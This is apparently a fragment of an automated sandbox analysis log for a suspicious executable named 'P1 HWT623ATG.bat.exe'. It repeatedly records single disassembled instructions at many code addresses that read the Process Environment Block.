Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov eax, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov eax, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov eax, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov ecx, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov eax, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B035C mov eax, dword ptr fs:[00000030h]	9_2_012B035C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FA352 mov eax, dword ptr fs:[00000030h]	9_2_012FA352
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D8350 mov ecx, dword ptr fs:[00000030h]	9_2_012D8350
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E388 mov eax, dword ptr fs:[00000030h]	9_2_0122E388
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E388 mov eax, dword ptr fs:[00000030h]	9_2_0122E388
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E388 mov eax, dword ptr fs:[00000030h]	9_2_0122E388
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125438F mov eax, dword ptr fs:[00000030h]	9_2_0125438F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125438F mov eax, dword ptr fs:[00000030h]	9_2_0125438F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01228397 mov eax, dword ptr fs:[00000030h]	9_2_01228397
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01228397 mov eax, dword ptr fs:[00000030h]	9_2_01228397
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01228397 mov eax, dword ptr fs:[00000030h]	9_2_01228397
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012403E9 mov eax, dword ptr fs:[00000030h]	9_2_012403E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0124E3F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0124E3F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0124E3F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012663FF mov eax, dword ptr fs:[00000030h]	9_2_012663FF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EC3CD mov eax, dword ptr fs:[00000030h]	9_2_012EC3CD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0123A3C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012383C0 mov eax, dword ptr fs:[00000030h]	9_2_012383C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012383C0 mov eax, dword ptr fs:[00000030h]	9_2_012383C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012383C0 mov eax, dword ptr fs:[00000030h]	9_2_012383C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012383C0 mov eax, dword ptr fs:[00000030h]	9_2_012383C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B63C0 mov eax, dword ptr fs:[00000030h]	9_2_012B63C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE3DB mov eax, dword ptr fs:[00000030h]	9_2_012DE3DB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE3DB mov eax, dword ptr fs:[00000030h]	9_2_012DE3DB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE3DB mov ecx, dword ptr fs:[00000030h]	9_2_012DE3DB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE3DB mov eax, dword ptr fs:[00000030h]	9_2_012DE3DB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D43D4 mov eax, dword ptr fs:[00000030h]	9_2_012D43D4
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D43D4 mov eax, dword ptr fs:[00000030h]	9_2_012D43D4
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122823B mov eax, dword ptr fs:[00000030h]	9_2_0122823B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234260 mov eax, dword ptr fs:[00000030h]	9_2_01234260
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234260 mov eax, dword ptr fs:[00000030h]	9_2_01234260
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234260 mov eax, dword ptr fs:[00000030h]	9_2_01234260
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122826B mov eax, dword ptr fs:[00000030h]	9_2_0122826B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274 mov eax, dword ptr fs:[00000030h]	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B8243 mov eax, dword ptr fs:[00000030h]	9_2_012B8243
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B8243 mov ecx, dword ptr fs:[00000030h]	9_2_012B8243
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A250 mov eax, dword ptr fs:[00000030h]	9_2_0122A250
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236259 mov eax, dword ptr fs:[00000030h]	9_2_01236259
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EA250 mov eax, dword ptr fs:[00000030h]	9_2_012EA250
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EA250 mov eax, dword ptr fs:[00000030h]	9_2_012EA250
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012402A0 mov eax, dword ptr fs:[00000030h]	9_2_012402A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012402A0 mov eax, dword ptr fs:[00000030h]	9_2_012402A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov eax, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov ecx, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov eax, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov eax, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov eax, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C62A0 mov eax, dword ptr fs:[00000030h]	9_2_012C62A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E284 mov eax, dword ptr fs:[00000030h]	9_2_0126E284
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E284 mov eax, dword ptr fs:[00000030h]	9_2_0126E284
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B0283 mov eax, dword ptr fs:[00000030h]	9_2_012B0283
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B0283 mov eax, dword ptr fs:[00000030h]	9_2_012B0283
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B0283 mov eax, dword ptr fs:[00000030h]	9_2_012B0283
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012402E1 mov eax, dword ptr fs:[00000030h]	9_2_012402E1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012402E1 mov eax, dword ptr fs:[00000030h]	9_2_012402E1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012402E1 mov eax, dword ptr fs:[00000030h]	9_2_012402E1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0123A2C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0123A2C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0123A2C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0123A2C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0123A2C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535 mov eax, dword ptr fs:[00000030h]	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E53E mov eax, dword ptr fs:[00000030h]	9_2_0125E53E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E53E mov eax, dword ptr fs:[00000030h]	9_2_0125E53E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E53E mov eax, dword ptr fs:[00000030h]	9_2_0125E53E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E53E mov eax, dword ptr fs:[00000030h]	9_2_0125E53E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E53E mov eax, dword ptr fs:[00000030h]	9_2_0125E53E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6500 mov eax, dword ptr fs:[00000030h]	9_2_012C6500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304500 mov eax, dword ptr fs:[00000030h]	9_2_01304500
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126656A mov eax, dword ptr fs:[00000030h]	9_2_0126656A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126656A mov eax, dword ptr fs:[00000030h]	9_2_0126656A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126656A mov eax, dword ptr fs:[00000030h]	9_2_0126656A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238550 mov eax, dword ptr fs:[00000030h]	9_2_01238550
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238550 mov eax, dword ptr fs:[00000030h]	9_2_01238550
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B05A7 mov eax, dword ptr fs:[00000030h]	9_2_012B05A7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B05A7 mov eax, dword ptr fs:[00000030h]	9_2_012B05A7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B05A7 mov eax, dword ptr fs:[00000030h]	9_2_012B05A7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012545B1 mov eax, dword ptr fs:[00000030h]	9_2_012545B1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012545B1 mov eax, dword ptr fs:[00000030h]	9_2_012545B1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01232582 mov eax, dword ptr fs:[00000030h]	9_2_01232582
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01232582 mov ecx, dword ptr fs:[00000030h]	9_2_01232582
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01264588 mov eax, dword ptr fs:[00000030h]	9_2_01264588
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E59C mov eax, dword ptr fs:[00000030h]	9_2_0126E59C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0125E5E7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012325E0 mov eax, dword ptr fs:[00000030h]	9_2_012325E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C5ED mov eax, dword ptr fs:[00000030h]	9_2_0126C5ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C5ED mov eax, dword ptr fs:[00000030h]	9_2_0126C5ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E5CF mov eax, dword ptr fs:[00000030h]	9_2_0126E5CF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E5CF mov eax, dword ptr fs:[00000030h]	9_2_0126E5CF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012365D0 mov eax, dword ptr fs:[00000030h]	9_2_012365D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0126A5D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0126A5D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E420 mov eax, dword ptr fs:[00000030h]	9_2_0122E420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E420 mov eax, dword ptr fs:[00000030h]	9_2_0122E420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122E420 mov eax, dword ptr fs:[00000030h]	9_2_0122E420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122C427 mov eax, dword ptr fs:[00000030h]	9_2_0122C427
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6420 mov eax, dword ptr fs:[00000030h]	9_2_012B6420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A430 mov eax, dword ptr fs:[00000030h]	9_2_0126A430
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01268402 mov eax, dword ptr fs:[00000030h]	9_2_01268402
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01268402 mov eax, dword ptr fs:[00000030h]	9_2_01268402
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01268402 mov eax, dword ptr fs:[00000030h]	9_2_01268402
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BC460 mov ecx, dword ptr fs:[00000030h]	9_2_012BC460
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125A470 mov eax, dword ptr fs:[00000030h]	9_2_0125A470
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125A470 mov eax, dword ptr fs:[00000030h]	9_2_0125A470
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125A470 mov eax, dword ptr fs:[00000030h]	9_2_0125A470
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E443 mov eax, dword ptr fs:[00000030h]	9_2_0126E443
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EA456 mov eax, dword ptr fs:[00000030h]	9_2_012EA456
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122645D mov eax, dword ptr fs:[00000030h]	9_2_0122645D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125245A mov eax, dword ptr fs:[00000030h]	9_2_0125245A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012364AB mov eax, dword ptr fs:[00000030h]	9_2_012364AB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012644B0 mov ecx, dword ptr fs:[00000030h]	9_2_012644B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BA4B0 mov eax, dword ptr fs:[00000030h]	9_2_012BA4B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EA49A mov eax, dword ptr fs:[00000030h]	9_2_012EA49A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012304E5 mov ecx, dword ptr fs:[00000030h]	9_2_012304E5
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C720 mov eax, dword ptr fs:[00000030h]	9_2_0126C720
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C720 mov eax, dword ptr fs:[00000030h]	9_2_0126C720
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126273C mov eax, dword ptr fs:[00000030h]	9_2_0126273C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126273C mov ecx, dword ptr fs:[00000030h]	9_2_0126273C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126273C mov eax, dword ptr fs:[00000030h]	9_2_0126273C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AC730 mov eax, dword ptr fs:[00000030h]	9_2_012AC730
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C700 mov eax, dword ptr fs:[00000030h]	9_2_0126C700
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230710 mov eax, dword ptr fs:[00000030h]	9_2_01230710
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01260710 mov eax, dword ptr fs:[00000030h]	9_2_01260710
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238770 mov eax, dword ptr fs:[00000030h]	9_2_01238770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
